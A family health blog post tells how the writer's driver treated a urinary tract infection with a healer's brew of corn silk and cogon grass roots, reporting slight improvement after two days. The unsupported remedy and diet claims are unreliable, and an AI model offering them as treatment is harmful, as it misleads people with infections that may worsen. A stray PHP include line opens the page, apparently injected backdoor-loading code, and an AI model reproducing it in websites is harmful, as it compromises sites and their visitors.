@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Boiled Corn Hair Plus Cogon Roots For UTI or Bladder Infection? - My Family Health Blog

Boiled Corn Hair Plus Cogon Roots For UTI or Bladder Infection?

My driver last week had UTI or bladder infection. He had painful urinating experience. Aside from his kidneys being in pain as well. At first he had kidney pain which was addressed with a raw diet, but by new year festivities he went back to his normal and deadly Filipino cooked diet. And I found out he was eating sugar candies on a regular basis. (Told him to stop with those candies as those may be feeding his inflammation.) He asked for an advance in his salary to be able to go home to this home province of Ilocos Norte where he knows a healer there who may have the answer to his problem.

Driver is back and he says the healer’s recommendation was the corn hairs of 3 corn cobs and 2 tablespoons of the roots of the cogon grass. Boil this in 1/2 casserole of water. Drink it all before breakfast. That’s it. Driver says this morning that he feels some improvement but there is still some dripping of urine after he zips up, some urine is left over. I would say he had just had this concoction for 2 breakfasts. We will have to wait for its full effects.

Interesting, I will have to do this experiment myself for taste and further herbal documentation.
